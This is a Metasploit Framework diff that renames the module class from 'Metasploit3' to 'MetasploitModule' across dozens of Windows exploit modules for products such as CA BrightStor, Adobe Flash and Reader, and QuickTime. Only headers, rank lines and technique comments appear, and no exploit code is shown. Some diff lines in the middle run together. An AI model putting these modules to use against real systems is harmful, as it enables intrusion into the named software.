diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb
index 5ba4ca46fb..0fe296dcb1 100644
--- a/modules/exploits/windows/brightstor/message_engine_heap.rb
+++ b/modules/exploits/windows/brightstor/message_engine_heap.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::DCERPC
diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb
index 2785745edc..6c485b64f0 100644
--- a/modules/exploits/windows/brightstor/sql_agent.rb
+++ b/modules/exploits/windows/brightstor/sql_agent.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb
index dc9da31f15..46702d30fd 100644
--- a/modules/exploits/windows/brightstor/tape_engine.rb
+++ b/modules/exploits/windows/brightstor/tape_engine.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::DCERPC
diff --git a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb
index 6e55ba95b3..36c01eb3c3 100644
--- a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb
+++ b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb
index 770d7c8fa9..4d157fe3e2 100644
--- a/modules/exploits/windows/brightstor/universal_agent.rb
+++ b/modules/exploits/windows/brightstor/universal_agent.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb
index 2f18a7668a..39112c8f94 100644
--- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb
+++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb
index 2194a15c1e..20550092a5 100644
--- a/modules/exploits/windows/browser/adobe_flash_avm2.rb
+++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb
index 57bc88f9aa..fc286ce6bd 100644
--- a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb
+++ b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
index 34dcd36cb9..0b3e808fbc 100644
--- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
+++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
index 5b1fdf05f8..f6d45a1423 100644
--- a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
+++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
index ac3e425873..7d18fb3de6 100644
--- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
+++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
index 692e2be2fa..3e0b780952 100644
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb
index e1f1d0072b..4f831045aa 100644
--- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb
+++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb
index f000571844..9de4c02cc0 100644
--- a/modules/exploits/windows/browser/adobe_flash_pcre.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000'
diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
index 7cd4e5d44e..3d5fea3c40 100644
--- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
index 89e33338e5..84bc9cf971 100644
--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
index 8acbbb573a..b2d3ce686c 100644
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
index b4fa07267a..9111d09548 100644
--- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
+++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
index 5575afab8c..169eb46fca 100644
--- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
+++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
index b1af657d89..3c0a8c62b0 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
index 2fd3934e19..b20663ea80 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index 3a7dcbd1c1..cab570badc 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
index d512e180d4..325a1669b1 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
index bfcdff41d3..c806c3cb97 100644
--- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
+++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb
index cf67c75243..b0c0e7dffc 100644
--- a/modules/exploits/windows/browser/adobe_geticon.rb
+++ b/modules/exploits/windows/browser/adobe_geticon.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb
index 92bece600b..8b26e8b882 100644
--- a/modules/exploits/windows/browser/adobe_jbig2decode.rb
+++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb
index ab1bbc2970..61ffba6cb5 100644
--- a/modules/exploits/windows/browser/adobe_media_newplayer.rb
+++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
index 6d3843fb63..d27e4c3fdd 100644
--- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
+++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb
index 388c30fe6b..a417a07bf4 100644
--- a/modules/exploits/windows/browser/adobe_toolbutton.rb
+++ b/modules/exploits/windows/browser/adobe_toolbutton.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb
index 392d49790e..03a8c41b0d 100644
--- a/modules/exploits/windows/browser/adobe_utilprintf.rb
+++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb index 1598534a4b..6e83a0298d 100644 --- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb +++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index cd7abc4965..e92dbac293 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index 8ed7b765ad..ab8329aab8 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 0ed7599111..61d9d87c34 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb 
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
index 618ceede6d..41de2bcd83 100644
--- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb
+++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
index 6426521138..73c8fbc8df 100644
--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb
index 38e8c16c39..d34d0986cc 100644
--- a/modules/exploits/windows/browser/apple_itunes_playlist.rb
+++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
index 8907f6869c..7432c5f21f 100644
--- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
index 69d6b8a164..da040e12fd 100644
--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
index fd94da6b32..c7f952df5b 100644
--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit4 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
index 0a2cdaa1ed..14d8274cce 100644
--- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
index 2355aab342..0e8c2c5918 100644
--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking # needs more testing/targets to be Great
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
index 6d58e6d12d..ec9ff0db78 100644
--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb
index f73ec53adf..fa0467d743 100644
--- a/modules/exploits/windows/browser/ask_shortformat.rb
+++ b/modules/exploits/windows/browser/ask_shortformat.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
index 1bd56b231c..19c103ab84 100644
--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb
index 695e939113..6f09ebd1d5 100644
--- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb
+++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb
index 523b471db6..2084de912a 100644
--- a/modules/exploits/windows/browser/autodesk_idrop.rb
+++ b/modules/exploits/windows/browser/autodesk_idrop.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb
index a8e80a26fa..29a01fdafe 100644
--- a/modules/exploits/windows/browser/aventail_epi_activex.rb
+++ b/modules/exploits/windows/browser/aventail_epi_activex.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking # heap spray and address shifty
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
index 770403a7c7..e983150018 100644
--- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
+++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
@@ -23,7 +23,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
index d0be485f04..c268856ee4 100644
--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
index 271caa3851..bb736f1946 100644
--- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
+++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb
index bf6181bd25..e5fb4cc725 100644
--- a/modules/exploits/windows/browser/barcode_ax49.rb
+++ b/modules/exploits/windows/browser/barcode_ax49.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
index 3a63699a2f..f883eb72e4 100644
--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
index b4ffe3edf2..9936fc912d 100644
--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb
index 62d06f8211..757ba12da7 100644
--- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb
+++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
index 3a39839a25..8fe38efe5c 100644
--- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
+++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
index b5f802fa7f..55b5c6df4c 100644
--- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
+++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
